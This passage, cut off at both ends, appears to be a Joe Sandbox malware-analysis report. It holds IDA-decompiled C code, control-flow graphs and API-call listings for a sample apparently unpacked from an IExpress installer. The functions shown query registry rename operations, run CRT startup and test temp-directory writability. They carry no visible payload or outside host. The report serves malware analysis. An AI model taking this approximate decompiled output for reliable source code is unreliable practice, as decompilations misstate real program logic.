                                                                                                                                                                                                      								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                      								RegCloseKey(_v12); // executed
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							L7:
                                                                                                                                                                                                      							_t31 = _v8;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t31;
                                                                                                                                                                                                      				goto L12;
                                                                                                                                                                                                      			}











                                                                                                                                                                                                      0x003e2572
                                                                                                                                                                                                      0x003e2573
                                                                                                                                                                                                      0x003e2575
                                                                                                                                                                                                      0x003e2578
                                                                                                                                                                                                      0x003e257d
                                                                                                                                                                                                      0x003e2627
                                                                                                                                                                                                      0x003e2583
                                                                                                                                                                                                      0x003e2586
                                                                                                                                                                                                      0x003e2589
                                                                                                                                                                                                      0x003e25eb
                                                                                                                                                                                                      0x003e2607
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2609
                                                                                                                                                                                                      0x003e261a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e261a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e258b
                                                                                                                                                                                                      0x003e258b
                                                                                                                                                                                                      0x003e259e
                                                                                                                                                                                                      0x003e25b2
                                                                                                                                                                                                      0x003e25ba
                                                                                                                                                                                                      0x003e25cb
                                                                                                                                                                                                      0x003e25d1
                                                                                                                                                                                                      0x003e25d6
                                                                                                                                                                                                      0x003e25da
                                                                                                                                                                                                      0x003e25dd
                                                                                                                                                                                                      0x003e25dd
                                                                                                                                                                                                      0x003e25e3
                                                                                                                                                                                                      0x003e25e3
                                                                                                                                                                                                      0x003e25e3
                                                                                                                                                                                                      0x003e258b
                                                                                                                                                                                                      0x003e2589
                                                                                                                                                                                                      0x003e262f
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,003E4096,003E4096,?,003E1ED3,00000001,00000000,?,?,003E4137,?), ref: 003E25B2
                                                                                                                                                                                                      • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,003E4096,?,003E1ED3,00000001,00000000,?,?,003E4137,?,003E4096), ref: 003E25CB
                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,003E1ED3,00000001,00000000,?,?,003E4137,?,003E4096), ref: 003E25DD
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,003E4096,003E4096,?,003E1ED3,00000001,00000000,?,?,003E4137,?), ref: 003E25FF
                                                                                                                                                                                                      • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,003E4096,00000000,00000000,00000000,00000000,?,003E1ED3,00000001,00000000), ref: 003E261A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • PendingFileRenameOperations, xrefs: 003E25C3
                                                                                                                                                                                                      • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 003E25F5
                                                                                                                                                                                                      • System\CurrentControlSet\Control\Session Manager, xrefs: 003E25A8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                      • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                      • API String ID: 2209512893-559176071
                                                                                                                                                                                                      • Opcode ID: 1e96aa83aff6d8a3f4c0664efa22f24b1dd72ef6c4a799c6c814ac62b5f50b68
                                                                                                                                                                                                      • Instruction ID: 64566e931cc17646203b65a560553f1632f9bbe4d5715f4312668706de057de9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e96aa83aff6d8a3f4c0664efa22f24b1dd72ef6c4a799c6c814ac62b5f50b68
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18116D359022B8BBDB22DB939C49DFBBE6CEF017A1F114255F808A20C0D6705E44E6A1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 577 3e6a60-3e6a91 call 3e7155 call 3e7208 GetStartupInfoW 583 3e6a93-3e6aa2 577->583 584 3e6abc-3e6abe 583->584 585 3e6aa4-3e6aa6 583->585 586 3e6abf-3e6ac5 584->586 587 3e6aaf-3e6aba Sleep 585->587 588 3e6aa8-3e6aad 585->588 589 3e6ac7-3e6acf _amsg_exit 586->589 590 3e6ad1-3e6ad7 586->590 587->583 588->586 591 3e6b0b-3e6b11 589->591 592 3e6ad9-3e6ae9 call 3e6c3f 590->592 593 3e6b05 590->593 595 3e6b2e-3e6b30 591->595 596 3e6b13-3e6b24 _initterm 591->596 597 3e6aee-3e6af2 592->597 593->591 598 3e6b3b-3e6b42 595->598 599 3e6b32-3e6b39 595->599 596->595 597->591 600 3e6af4-3e6b00 597->600 601 3e6b67-3e6b71 598->601 602 3e6b44-3e6b51 call 3e7060 598->602 599->598 604 3e6c39-3e6c3e call 3e724d 600->604 603 3e6b74-3e6b79 601->603 602->601 610 3e6b53-3e6b65 602->610 607 3e6b7b-3e6b7d 603->607 608 3e6bc5-3e6bc8 603->608 613 3e6b7f-3e6b81 607->613 614 3e6b94-3e6b98 607->614 611 3e6bca-3e6bd3 608->611 612 3e6bd6-3e6be3 _ismbblead 608->612 610->601 611->612 616 3e6be9-3e6bed 612->616 617 3e6be5-3e6be6 612->617 613->608 618 3e6b83-3e6b85 613->618 619 3e6b9a-3e6b9e 614->619 620 3e6ba0-3e6ba2 614->620 616->603 622 3e6c1e-3e6c25 616->622 617->616 618->614 623 3e6b87-3e6b8a 618->623 624 3e6ba3-3e6bbc call 3e2bfb 619->624 620->624 626 3e6c27-3e6c2d _cexit 622->626 627 3e6c32 622->627 623->614 628 3e6b8c-3e6b92 623->628 624->622 630 3e6bbe-3e6bbf exit 624->630 626->627 627->604 628->618 630->608
                                                                                                                                                                                                      C-Code - Quality: 51%
                                                                                                                                                                                                      			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                      				signed int* _t25;
                                                                                                                                                                                                      				signed int _t26;
                                                                                                                                                                                                      				signed int _t29;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				signed int _t37;
                                                                                                                                                                                                      				signed char _t41;
                                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                                      				signed int _t54;
                                                                                                                                                                                                      				intOrPtr _t56;
                                                                                                                                                                                                      				signed int _t58;
                                                                                                                                                                                                      				signed int _t59;
                                                                                                                                                                                                      				intOrPtr* _t60;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				void* _t67;
                                                                                                                                                                                                      				void* _t68;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				E003E7155();
                                                                                                                                                                                                      				_push(0x58);
                                                                                                                                                                                                      				_push(0x3e72b8);
                                                                                                                                                                                                      				E003E7208(__ebx, __edi, __esi);
                                                                                                                                                                                                      				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                      				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                      				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                      				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                      				_t53 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                      					if(0 == 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(0 != _t56) {
                                                                                                                                                                                                      						Sleep(0x3e8);
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t58 = 1;
                                                                                                                                                                                                      						_t53 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L7:
                                                                                                                                                                                                      					_t67 =  *0x3e88b0 - _t58; // 0x2
                                                                                                                                                                                                      					if(_t67 != 0) {
                                                                                                                                                                                                      						__eflags =  *0x3e88b0; // 0x2
                                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                                      							 *0x3e81e4 = _t58;
                                                                                                                                                                                                      							goto L13;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							 *0x3e88b0 = _t58;
                                                                                                                                                                                                      							_t37 = E003E6C3F(0x3e10b8, 0x3e10c4); // executed
                                                                                                                                                                                                      							__eflags = _t37;
                                                                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                                                                      								goto L13;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                      								_t30 = 0xff;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_push(0x1f);
                                                                                                                                                                                                      						L003E6FF4();
                                                                                                                                                                                                      						L13:
                                                                                                                                                                                                      						_t68 =  *0x3e88b0 - _t58; // 0x2
                                                                                                                                                                                                      						if(_t68 == 0) {
                                                                                                                                                                                                      							_push(0x3e10b4);
                                                                                                                                                                                                      							_push(0x3e10ac);
                                                                                                                                                                                                      							L003E7202();
                                                                                                                                                                                                      							 *0x3e88b0 = 2;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if(_t53 == 0) {
                                                                                                                                                                                                      							 *0x3e88ac = 0;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t71 =  *0x3e88b4;
                                                                                                                                                                                                      						if( *0x3e88b4 != 0 && E003E7060(_t71, 0x3e88b4) != 0) {
                                                                                                                                                                                                      							_t60 =  *0x3e88b4; // 0x0
                                                                                                                                                                                                      							 *0x3ea288(0, 2, 0);
                                                                                                                                                                                                      							 *_t60();
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t25 = __imp___acmdln; // 0x76665b9c
                                                                                                                                                                                                      						_t59 =  *_t25;
                                                                                                                                                                                                      						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                      							_t41 =  *_t59;
                                                                                                                                                                                                      							if(_t41 > 0x20) {
                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							if(_t41 != 0) {
                                                                                                                                                                                                      								if(_t54 != 0) {
                                                                                                                                                                                                      									goto L32;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                      										_t59 = _t59 + 1;
                                                                                                                                                                                                      										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      										_t41 =  *_t59;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                      							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                      								_t29 = 0xa;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_push(_t29);
                                                                                                                                                                                                      							_t30 = E003E2BFB(0x3e0000, 0, _t59); // executed
                                                                                                                                                                                                      							 *0x3e81e0 = _t30;
                                                                                                                                                                                                      							__eflags =  *0x3e81f8;
                                                                                                                                                                                                      							if( *0x3e81f8 == 0) {
                                                                                                                                                                                                      								exit(_t30); // executed
                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags =  *0x3e81e4;
                                                                                                                                                                                                      							if( *0x3e81e4 == 0) {
                                                                                                                                                                                                      								__imp___cexit();
                                                                                                                                                                                                      								_t30 =  *0x3e81e0; // 0x80070002
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                      							goto L40;
                                                                                                                                                                                                      							L32:
                                                                                                                                                                                                      							__eflags = _t41 - 0x22;
                                                                                                                                                                                                      							if(_t41 == 0x22) {
                                                                                                                                                                                                      								__eflags = _t54;
                                                                                                                                                                                                      								_t15 = _t54 == 0;
                                                                                                                                                                                                      								__eflags = _t15;
                                                                                                                                                                                                      								_t54 = 0 | _t15;
                                                                                                                                                                                                      								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                      							__imp___ismbblead(_t26);
                                                                                                                                                                                                      							__eflags = _t26;
                                                                                                                                                                                                      							if(_t26 != 0) {
                                                                                                                                                                                                      								_t59 = _t59 + 1;
                                                                                                                                                                                                      								__eflags = _t59;
                                                                                                                                                                                                      								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t59 = _t59 + 1;
                                                                                                                                                                                                      							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L40:
                                                                                                                                                                                                      					return E003E724D(_t30);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t58 = 1;
                                                                                                                                                                                                      				__eflags = 1;
                                                                                                                                                                                                      				goto L7;
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      0x003e6a60
                                                                                                                                                                                                      0x003e6a6a
                                                                                                                                                                                                      0x003e6a6c
                                                                                                                                                                                                      0x003e6a71
                                                                                                                                                                                                      0x003e6a78
                                                                                                                                                                                                      0x003e6a7f
                                                                                                                                                                                                      0x003e6a85
                                                                                                                                                                                                      0x003e6a8e
                                                                                                                                                                                                      0x003e6a91
                                                                                                                                                                                                      0x003e6a93
                                                                                                                                                                                                      0x003e6a9c
                                                                                                                                                                                                      0x003e6aa2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e6aa6
                                                                                                                                                                                                      0x003e6ab4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e6aa8
                                                                                                                                                                                                      0x003e6aaa
                                                                                                                                                                                                      0x003e6aab
                                                                                                                                                                                                      0x003e6aab
                                                                                                                                                                                                      0x003e6abf
                                                                                                                                                                                                      0x003e6abf
                                                                                                                                                                                                      0x003e6ac5
                                                                                                                                                                                                      0x003e6ad1
                                                                                                                                                                                                      0x003e6ad7
                                                                                                                                                                                                      0x003e6b05
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e6ad9
                                                                                                                                                                                                      0x003e6ad9
                                                                                                                                                                                                      0x003e6ae9
                                                                                                                                                                                                      0x003e6af0
                                                                                                                                                                                                      0x003e6af2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e6af4
                                                                                                                                                                                                      0x003e6af4
                                                                                                                                                                                                      0x003e6afb
                                                                                                                                                                                                      0x003e6afb
                                                                                                                                                                                                      0x003e6af2
                                                                                                                                                                                                      0x003e6ac7
                                                                                                                                                                                                      0x003e6ac7
                                                                                                                                                                                                      0x003e6ac9
                                                                                                                                                                                                      0x003e6b0b
                                                                                                                                                                                                      0x003e6b0b
                                                                                                                                                                                                      0x003e6b11
                                                                                                                                                                                                      0x003e6b13
                                                                                                                                                                                                      0x003e6b18
                                                                                                                                                                                                      0x003e6b1d
                                                                                                                                                                                                      0x003e6b24
                                                                                                                                                                                                      0x003e6b24
                                                                                                                                                                                                      0x003e6b30
                                                                                                                                                                                                      0x003e6b39
                                                                                                                                                                                                      0x003e6b39
                                                                                                                                                                                                      0x003e6b3b
                                                                                                                                                                                                      0x003e6b42
                                                                                                                                                                                                      0x003e6b57
                                                                                                                                                                                                      0x003e6b5f
                                                                                                                                                                                                      0x003e6b65
                                                                                                                                                                                                      0x003e6b65
                                                                                                                                                                                                      0x003e6b67
                                                                                                                                                                                                      0x003e6b6c
                                                                                                                                                                                                      0x003e6b6e
                                                                                                                                                                                                      0x003e6b71
                                                                                                                                                                                                      0x003e6b74
                                                                                                                                                                                                      0x003e6b74
                                                                                                                                                                                                      0x003e6b79
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e6b7d
                                                                                                                                                                                                      0x003e6b81
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e6b83
                                                                                                                                                                                                      0x003e6b8c
                                                                                                                                                                                                      0x003e6b8d
                                                                                                                                                                                                      0x003e6b90
                                                                                                                                                                                                      0x003e6b90
                                                                                                                                                                                                      0x003e6b83
                                                                                                                                                                                                      0x003e6b81
                                                                                                                                                                                                      0x003e6b94
                                                                                                                                                                                                      0x003e6b98
                                                                                                                                                                                                      0x003e6ba2
                                                                                                                                                                                                      0x003e6b9a
                                                                                                                                                                                                      0x003e6b9a
                                                                                                                                                                                                      0x003e6b9a
                                                                                                                                                                                                      0x003e6ba3
                                                                                                                                                                                                      0x003e6bab
                                                                                                                                                                                                      0x003e6bb0
                                                                                                                                                                                                      0x003e6bb5
                                                                                                                                                                                                      0x003e6bbc
                                                                                                                                                                                                      0x003e6bbf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e6bbf
                                                                                                                                                                                                      0x003e6c1e
                                                                                                                                                                                                      0x003e6c25
                                                                                                                                                                                                      0x003e6c27
                                                                                                                                                                                                      0x003e6c2d
                                                                                                                                                                                                      0x003e6c2d
                                                                                                                                                                                                      0x003e6c32
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e6bc5
                                                                                                                                                                                                      0x003e6bc5
                                                                                                                                                                                                      0x003e6bc8
                                                                                                                                                                                                      0x003e6bcc
                                                                                                                                                                                                      0x003e6bce
                                                                                                                                                                                                      0x003e6bce
                                                                                                                                                                                                      0x003e6bd1
                                                                                                                                                                                                      0x003e6bd3
                                                                                                                                                                                                      0x003e6bd3
                                                                                                                                                                                                      0x003e6bd6
                                                                                                                                                                                                      0x003e6bda
                                                                                                                                                                                                      0x003e6be1
                                                                                                                                                                                                      0x003e6be3
                                                                                                                                                                                                      0x003e6be5
                                                                                                                                                                                                      0x003e6be5
                                                                                                                                                                                                      0x003e6be6
                                                                                                                                                                                                      0x003e6be6
                                                                                                                                                                                                      0x003e6be9
                                                                                                                                                                                                      0x003e6bea
                                                                                                                                                                                                      0x003e6bea
                                                                                                                                                                                                      0x003e6b74
                                                                                                                                                                                                      0x003e6c39
                                                                                                                                                                                                      0x003e6c3e
                                                                                                                                                                                                      0x003e6c3e
                                                                                                                                                                                                      0x003e6abe
                                                                                                                                                                                                      0x003e6abe
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 003E7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 003E7182
                                                                                                                                                                                                        • Part of subcall function 003E7155: GetCurrentProcessId.KERNEL32 ref: 003E7191
                                                                                                                                                                                                        • Part of subcall function 003E7155: GetCurrentThreadId.KERNEL32 ref: 003E719A
                                                                                                                                                                                                        • Part of subcall function 003E7155: GetTickCount.KERNEL32 ref: 003E71A3
                                                                                                                                                                                                        • Part of subcall function 003E7155: QueryPerformanceCounter.KERNEL32(?), ref: 003E71B8
                                                                                                                                                                                                      • GetStartupInfoW.KERNEL32(?,003E72B8,00000058), ref: 003E6A7F
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 003E6AB4
                                                                                                                                                                                                      • _amsg_exit.MSVCRT ref: 003E6AC9
                                                                                                                                                                                                      • _initterm.MSVCRT ref: 003E6B1D
                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 003E6B49
                                                                                                                                                                                                      • exit.KERNELBASE ref: 003E6BBF
                                                                                                                                                                                                      • _ismbblead.MSVCRT ref: 003E6BDA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 836923961-0
                                                                                                                                                                                                      • Opcode ID: b6d2d4955b1be6cf4b206a5c8f0b4b46cb00f86e4e98c89993e01c93432fe406
                                                                                                                                                                                                      • Instruction ID: b471c59fa08cd6ff7ef50cd2eeefd9152f53b3f85ee46cd16ce43ef8f10bdbc2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6d2d4955b1be6cf4b206a5c8f0b4b46cb00f86e4e98c89993e01c93432fe406
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03410874D447F6CBDB339B6BDC867AA77A8AB54790F110329E945EB2D0CB704C418B41
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 631 3e58c8-3e58d5 632 3e58d8-3e58dd 631->632 632->632 633 3e58df-3e58f1 LocalAlloc 632->633 634 3e5919-3e5959 call 3e1680 call 3e658a CreateFileA LocalFree 633->634 635 3e58f3-3e5901 call 3e44b9 633->635 638 3e5906-3e5910 call 3e6285 634->638 645 3e595b-3e596c CloseHandle GetFileAttributesA 634->645 635->638 644 3e5912-3e5918 638->644 645->638 646 3e596e-3e5970 645->646 646->638 647 3e5972-3e597b 646->647 647->644
                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                      			E003E58C8(intOrPtr* __ecx) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				intOrPtr _t6;
                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                      				signed char _t16;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				intOrPtr* _t27;
                                                                                                                                                                                                      				CHAR* _t33;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_t33 = __ecx;
                                                                                                                                                                                                      				_t27 = __ecx;
                                                                                                                                                                                                      				_t23 = __ecx + 1;
                                                                                                                                                                                                      				do {
                                                                                                                                                                                                      					_t6 =  *_t27;
                                                                                                                                                                                                      					_t27 = _t27 + 1;
                                                                                                                                                                                                      				} while (_t6 != 0);
                                                                                                                                                                                                      				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                      				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                      				if(_t20 != 0) {
                                                                                                                                                                                                      					E003E1680(_t20, _t36, _t33);
                                                                                                                                                                                                      					E003E658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                      					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                      					_v8 = _t10;
                                                                                                                                                                                                      					LocalFree(_t20);
                                                                                                                                                                                                      					_t12 = _v8;
                                                                                                                                                                                                      					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                      						goto L4;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						CloseHandle(_t12);
                                                                                                                                                                                                      						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                      						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                      							goto L4;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							 *0x3e9124 = 0;
                                                                                                                                                                                                      							_t14 = 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E003E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					L4:
                                                                                                                                                                                                      					 *0x3e9124 = E003E6285();
                                                                                                                                                                                                      					_t14 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t14;
                                                                                                                                                                                                      			}













                                                                                                                                                                                                      0x003e58cd
                                                                                                                                                                                                      0x003e58d1
                                                                                                                                                                                                      0x003e58d3
                                                                                                                                                                                                      0x003e58d5
                                                                                                                                                                                                      0x003e58d8
                                                                                                                                                                                                      0x003e58d8
                                                                                                                                                                                                      0x003e58da
                                                                                                                                                                                                      0x003e58db
                                                                                                                                                                                                      0x003e58e1
                                                                                                                                                                                                      0x003e58ed
                                                                                                                                                                                                      0x003e58f1
                                                                                                                                                                                                      0x003e591e
                                                                                                                                                                                                      0x003e592c
                                                                                                                                                                                                      0x003e5943
                                                                                                                                                                                                      0x003e594a
                                                                                                                                                                                                      0x003e594d
                                                                                                                                                                                                      0x003e5953
                                                                                                                                                                                                      0x003e5959
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e595b
                                                                                                                                                                                                      0x003e595c
                                                                                                                                                                                                      0x003e5963
                                                                                                                                                                                                      0x003e596c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5972
                                                                                                                                                                                                      0x003e5974
                                                                                                                                                                                                      0x003e597a
                                                                                                                                                                                                      0x003e597a
                                                                                                                                                                                                      0x003e596c
                                                                                                                                                                                                      0x003e58f3
                                                                                                                                                                                                      0x003e5901
                                                                                                                                                                                                      0x003e5906
                                                                                                                                                                                                      0x003e590b
                                                                                                                                                                                                      0x003e5910
                                                                                                                                                                                                      0x003e5910
                                                                                                                                                                                                      0x003e5918

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,003E5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E58E7
                                                                                                                                                                                                      • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,003E5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E5943
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,003E5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E594D
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,003E5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E595C
                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,003E5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E5963
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
